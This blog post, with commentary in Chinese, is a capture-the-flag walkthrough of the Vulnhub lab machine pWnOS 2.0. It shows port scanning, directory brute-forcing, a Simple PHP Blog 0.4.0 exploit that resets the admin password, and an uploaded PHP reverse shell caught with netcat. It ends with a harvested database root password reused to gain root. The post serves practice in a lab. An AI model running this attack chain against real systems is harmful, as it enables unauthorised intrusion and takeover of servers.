Post

PWNOS2.0 Walkthrough

Posted
By Mutus
4 min read

Reconnaissance

Port Scanning

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

┌──(kali㉿kali)-[~]
└─$ nmap -A -sC -F 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-09 09:52 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00032s latency).
Not shown: 98 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds

Enumeration

HTTP Enumeration

这里发现存在80端口,使用dirb进行目录的爆破

1
2
3
4
5
6
7
8
9
10
11
12
13

┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.10.100 | grep "=="
==> DIRECTORY: http://10.10.10.100/blog/
==> DIRECTORY: http://10.10.10.100/includes/
==> DIRECTORY: http://10.10.10.100/blog/config/
==> DIRECTORY: http://10.10.10.100/blog/content/
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
==> DIRECTORY: http://10.10.10.100/blog/scripts/
==> DIRECTORY: http://10.10.10.100/blog/themes/

访问http://10.10.10.100/blog进入到了一个blog页面,查看网页源代码,发现该系统名为Simple PHP Blog 0.4.0

1

    <meta name="generator" content="Simple PHP Blog 0.4.0" />

使用searchsploit进行搜索,发现存在Multiple Remote

1
2
3
4
5
6
7
8

┌──(kali㉿kali)-[~]
└─$ searchsploit simple PHP 0.4
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities                           | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities                      | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities               | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s                                                                  | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                                              | php/webapps/16883.rb
Simple PHP Blog 0.4.7.1 - Remote Command Execution                                                         | php/webapps/1581.pl

Exploitation

使用1191.pl对其进行利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

┌──(kali㉿kali)-[~]
└─$ perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P admin

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: admin
Password is set to: admin


*** Exploit Completed....
Have a nice day! :)

使用刚刚设置好的账号密码进行登录

发现存在图片上传,尝试一下是否可以利用

成功上传,在攻击机下进行端口监听并执行访问该php文件,成功进行反弹shell

1
2
3
4
5
6
7
8
9
10
11
12

┌──(kali㉿kali)-[~]
└─$ nc -lvp 1234                         
listening on [any] 1234 ...
10.10.10.100: inverse host lookup failed: Unknown host
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.100] 44078
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
 20:00:24 up  4:22,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data

Privilege Escalation

/var目录下发现存在一个mysqli_connect.php的文件,对其进行查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

$ cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>

这里使用刚刚得到的密码,切换到root用户

1
2
3
4
5
6
7
8

# 此命令利用 Python 的 `pty` 模块中的 `spawn` 函数直接启动了一个正常交互式的 Bash shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@web:/var$ su root 
su root
Password: root@ISIntS
root@web:/var# id
id
uid=0(root) gid=0(root) groups=0(root)

#

Vulnhub
wlakthrough Vulnhub
This post is licensed under CC BY 4.0 by the author.

Trending Tags

Vulnhub wlakthrough